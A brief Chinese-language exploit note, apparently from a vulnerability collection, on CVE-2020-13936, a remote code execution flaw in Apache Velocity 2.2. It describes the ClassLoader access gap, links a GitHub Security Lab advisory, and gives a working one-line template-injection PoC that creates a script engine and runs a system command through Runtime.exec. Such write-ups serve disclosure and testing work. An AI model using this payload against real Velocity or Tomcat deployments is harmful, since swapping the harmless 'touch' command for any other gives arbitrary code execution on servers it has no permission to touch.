Apache Velocity 远程代码执行 (CVE-2020-13936)¶

Velocity Uberspector无法阻止访问java.lang.ClassLoader类加载器方法。在VelocityView的上下文中使用Velocity模板时，能够修改模版的攻击者可以使用与运行Servlet容器的帐户相同的权限执行任意Java代码或运行任意系统命令。

详细分析：https://securitylab.github.com/advisories/GHSL-2020-048-apache-velocity

测试版本：

Apache Velocity 2.2

PoC：

${req.getServletContext().getAttribute('org.apache.tomcat.InstanceManager').newInstance('javax.script.ScriptEngineManager').getEngineByName('js').eval("java.lang.Runtime.getRuntime().exec('touch /tmp/pwned')")}

from：https://securitylab.github.com/advisories/GHSL-2020-048-apache-velocity